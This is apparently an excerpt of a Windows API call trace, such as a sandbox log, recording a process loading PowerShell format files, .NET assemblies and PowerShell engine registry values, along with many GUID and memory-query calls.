	[0475.708] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.709] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0xaca, lpOverlapped=0x0) returned 1
	[0475.709] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cb79a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cb79a*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0475.709] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0475.709] CloseHandle (hObject=0x2ec) returned 1
	[0475.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0475.709] SetErrorMode (uMode=0x1) returned 0x1
	[0475.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0475.710] SetErrorMode (uMode=0x1) returned 0x1
	[0475.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0475.710] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x2ec) returned 0x0
	[0475.710] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0475.710] CoTaskMemAlloc (cb=0x5a) returned 0x1b921fe0
	[0475.710] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x1b921fe0, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0475.710] CoTaskMemFree (pv=0x1b921fe0) 
	[0475.710] RegCloseKey (hKey=0x2ec) returned 0x0
	[0475.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0475.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0476.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0476.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0476.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.723] VirtualQuery (in: lpAddress=0x24bb60, lpBuffer=0x24ca20, dwLength=0x30 | out: lpBuffer=0x24ca20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.724] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1a612168, Data2=0x8d2e, Data3=0x4696, Data4=([0]=0x96, [1]=0x57, [2]=0x2b, [3]=0x47, [4]=0x2f, [5]=0x42, [6]=0x6b, [7]=0x44))) returned 0x0
	[0477.725] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xc6889364, Data2=0x34ec, Data3=0x421a, Data4=([0]=0xb0, [1]=0xca, [2]=0x22, [3]=0xb9, [4]=0x28, [5]=0x72, [6]=0x6c, [7]=0x0))) returned 0x0
	[0477.726] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.727] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.728] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x98e5ef43, Data2=0xa75f, Data3=0x4ae6, Data4=([0]=0xa0, [1]=0xf0, [2]=0xf5, [3]=0x57, [4]=0xcb, [5]=0x1d, [6]=0x62, [7]=0xda))) returned 0x0
	[0477.731] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa58b528e, Data2=0x42c1, Data3=0x456a, Data4=([0]=0x87, [1]=0xae, [2]=0xcf, [3]=0xf6, [4]=0xf4, [5]=0xf1, [6]=0x65, [7]=0x3b))) returned 0x0
	[0477.731] VirtualQuery (in: lpAddress=0x24bf60, lpBuffer=0x24ce20, dwLength=0x30 | out: lpBuffer=0x24ce20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.732] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xfce515cb, Data2=0x6e53, Data3=0x4f5e, Data4=([0]=0xa5, [1]=0x5d, [2]=0xe1, [3]=0xb8, [4]=0x9b, [5]=0x6f, [6]=0xb0, [7]=0x38))) returned 0x0
	[0477.732] VirtualQuery (in: lpAddress=0x24b5d0, lpBuffer=0x24c490, dwLength=0x30 | out: lpBuffer=0x24c490*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.733] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x38f870db, Data2=0x710e, Data3=0x4f10, Data4=([0]=0xb5, [1]=0x54, [2]=0x90, [3]=0xee, [4]=0x40, [5]=0xfc, [6]=0x47, [7]=0xaf))) returned 0x0
	[0478.345] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x6c32afa6, Data2=0x1c17, Data3=0x437c, Data4=([0]=0xa2, [1]=0x1b, [2]=0xa0, [3]=0x11, [4]=0x79, [5]=0x74, [6]=0xeb, [7]=0xf0))) returned 0x0
	[0478.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0478.345] SetErrorMode (uMode=0x1) returned 0x1
	[0478.346] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0478.346] GetFileType (hFile=0x30c) returned 0x1
	[0478.346] SetErrorMode (uMode=0x1) returned 0x1
	[0478.346] GetFileType (hFile=0x30c) returned 0x1
	[0478.346] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.347] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.347] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.348] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.348] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.348] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.348] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.348] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.349] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.349] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.349] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.350] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.350] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.350] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.350] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.350] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.351] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.352] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0xbce, lpOverlapped=0x0) returned 1
	[0478.352] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0dd36, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0dd36*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0478.352] ReadFile (in: hFile=0x30c, lpBuffer=0x2e0e600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2e0e600*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0478.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0478.352] SetErrorMode (uMode=0x1) returned 0x1
	[0478.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0478.353] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
	[0478.353] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0478.353] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0478.353] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0478.353] CoTaskMemFree (pv=0x46ea70) 
	[0478.353] RegCloseKey (hKey=0x30c) returned 0x0
	[0478.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0478.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x93869158, Data2=0xda2a, Data3=0x4c31, Data4=([0]=0xb3, [1]=0xd9, [2]=0x35, [3]=0xb, [4]=0xe1, [5]=0x43, [6]=0xaa, [7]=0x20))) returned 0x0
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x98560523, Data2=0x9cf3, Data3=0x4e83, Data4=([0]=0xb9, [1]=0x44, [2]=0x67, [3]=0xc0, [4]=0xd7, [5]=0x8b, [6]=0xb2, [7]=0x82))) returned 0x0
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x61e612d7, Data2=0x633d, Data3=0x4121, Data4=([0]=0x96, [1]=0x49, [2]=0x9f, [3]=0xe8, [4]=0xf7, [5]=0xed, [6]=0xee, [7]=0x87))) returned 0x0
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1be92455, Data2=0xc0d3, Data3=0x4df9, Data4=([0]=0x81, [1]=0xf7, [2]=0x87, [3]=0xb4, [4]=0xe4, [5]=0x12, [6]=0x22, [7]=0x40))) returned 0x0
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x9f1e6a43, Data2=0xf895, Data3=0x412a, Data4=([0]=0x8f, [1]=0x61, [2]=0xad, [3]=0x5e, [4]=0x94, [5]=0x9c, [6]=0x14, [7]=0x70))) returned 0x0
	[0478.355] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x7b436f7e, Data2=0x4df0, Data3=0x4694, Data4=([0]=0xbb, [1]=0x40, [2]=0x5a, [3]=0x26, [4]=0x58, [5]=0xc2, [6]=0x7c, [7]=0xb7))) returned 0x0
	[0478.356] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5516c892, Data2=0xd63b, Data3=0x4fc4, Data4=([0]=0xa7, [1]=0x45, [2]=0xf9, [3]=0x1c, [4]=0xb5, [5]=0x7d, [6]=0xbb, [7]=0xd5))) returned 0x0
	[0478.356] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa2de7804, Data2=0xf125, Data3=0x42d3, Data4=([0]=0xa7, [1]=0xf, [2]=0x46, [3]=0x65, [4]=0xe5, [5]=0xbb, [6]=0x87, [7]=0xc6))) returned 0x0
	[0478.356] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa6045fdf, Data2=0xcfc5, Data3=0x4821, Data4=([0]=0xb7, [1]=0x8a, [2]=0xdf, [3]=0xbd, [4]=0xf3, [5]=0x84, [6]=0x8f, [7]=0xa1))) returned 0x0
	[0478.356] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x145a615f, Data2=0x712d, Data3=0x41ea, Data4=([0]=0x99, [1]=0x7c, [2]=0x42, [3]=0xff, [4]=0x75, [5]=0xe6, [6]=0x12, [7]=0xdc))) returned 0x0
	[0478.356] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xeb45551c, Data2=0x76fc, Data3=0x492c, Data4=([0]=0x9f, [1]=0x58, [2]=0xdf, [3]=0xe6, [4]=0x40, [5]=0x38, [6]=0xb9, [7]=0xc2))) returned 0x0
	[0478.357] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x96f1c406, Data2=0x97a2, Data3=0x47f9, Data4=([0]=0x8c, [1]=0x33, [2]=0x44, [3]=0xca, [4]=0x2e, [5]=0x10, [6]=0x51, [7]=0xd7))) returned 0x0
	[0478.357] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1257a0d4, Data2=0x6f20, Data3=0x48a8, Data4=([0]=0x91, [1]=0x2f, [2]=0x68, [3]=0x7, [4]=0x80, [5]=0xc, [6]=0xc6, [7]=0x7d))) returned 0x0
	[0478.357] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xb29ca370, Data2=0xa100, Data3=0x4ad7, Data4=([0]=0xb1, [1]=0x78, [2]=0x0, [3]=0x9a, [4]=0x77, [5]=0x45, [6]=0x64, [7]=0x4d))) returned 0x0
	[0478.357] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x30847e63, Data2=0x80f2, Data3=0x4ee9, Data4=([0]=0xbd, [1]=0x90, [2]=0xaf, [3]=0xa, [4]=0xcb, [5]=0x99, [6]=0xd6, [7]=0xab))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x4d02badf, Data2=0x9150, Data3=0x4c29, Data4=([0]=0x82, [1]=0xb4, [2]=0x6e, [3]=0xf3, [4]=0x1a, [5]=0xb, [6]=0xab, [7]=0x78))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x2052b2c6, Data2=0xe956, Data3=0x4d11, Data4=([0]=0xb6, [1]=0x5d, [2]=0x7c, [3]=0x94, [4]=0xc6, [5]=0xdb, [6]=0xd3, [7]=0x4))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xbb64676c, Data2=0x8edb, Data3=0x4d7f, Data4=([0]=0xbb, [1]=0x2b, [2]=0x55, [3]=0x47, [4]=0xea, [5]=0x2c, [6]=0x60, [7]=0x31))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xcc13f2c4, Data2=0x6ead, Data3=0x487f, Data4=([0]=0x95, [1]=0x55, [2]=0xac, [3]=0x85, [4]=0x8c, [5]=0x9a, [6]=0xb7, [7]=0xb))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x261c5339, Data2=0x5db7, Data3=0x4f07, Data4=([0]=0xbe, [1]=0x2c, [2]=0x3a, [3]=0xdf, [4]=0xa8, [5]=0x5f, [6]=0x4d, [7]=0xbb))) returned 0x0
	[0478.358] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x6eb73094, Data2=0xbaac, Data3=0x44d8, Data4=([0]=0x89, [1]=0x77, [2]=0x14, [3]=0x9d, [4]=0x3d, [5]=0x67, [6]=0xfd, [7]=0x84))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x680a1d3e, Data2=0xfcc0, Data3=0x440f, Data4=([0]=0x9a, [1]=0x8f, [2]=0x0, [3]=0xa, [4]=0x1f, [5]=0x18, [6]=0xfa, [7]=0x54))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x49a528b, Data2=0x77a, Data3=0x418c, Data4=([0]=0x83, [1]=0x1a, [2]=0x24, [3]=0xee, [4]=0xd8, [5]=0xe1, [6]=0x3f, [7]=0x8))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa0d6b5ff, Data2=0xc8, Data3=0x4f07, Data4=([0]=0x8a, [1]=0x45, [2]=0x39, [3]=0x20, [4]=0x9e, [5]=0x14, [6]=0x72, [7]=0xdc))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x3a08a6b3, Data2=0xb010, Data3=0x4999, Data4=([0]=0x9f, [1]=0x2b, [2]=0x82, [3]=0xb1, [4]=0x87, [5]=0x2c, [6]=0x9b, [7]=0xc0))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x4054fa00, Data2=0x2bca, Data3=0x4bd7, Data4=([0]=0xa1, [1]=0x55, [2]=0x50, [3]=0x24, [4]=0xbe, [5]=0x9c, [6]=0xac, [7]=0x29))) returned 0x0
	[0478.359] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x71aa88d5, Data2=0x9d96, Data3=0x4bd4, Data4=([0]=0x8e, [1]=0x38, [2]=0x44, [3]=0x3e, [4]=0xfa, [5]=0x84, [6]=0xa, [7]=0x99))) returned 0x0
	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xd681ce2e, Data2=0x5b1d, Data3=0x469f, Data4=([0]=0x8f, [1]=0x39, [2]=0xf9, [3]=0xf1, [4]=0x35, [5]=0xd3, [6]=0x7b, [7]=0xe8))) returned 0x0
	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x6d1d4fa, Data2=0x5429, Data3=0x425f, Data4=([0]=0xb8, [1]=0x86, [2]=0xa, [3]=0x95, [4]=0x2b, [5]=0xa4, [6]=0x2, [7]=0xb4))) returned 0x0
	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x7312c47f, Data2=0xbeea, Data3=0x4a01, Data4=([0]=0x8f, [1]=0xe1, [2]=0xc, [3]=0xd6, [4]=0xdb, [5]=0x26, [6]=0xc7, [7]=0x49))) returned 0x0
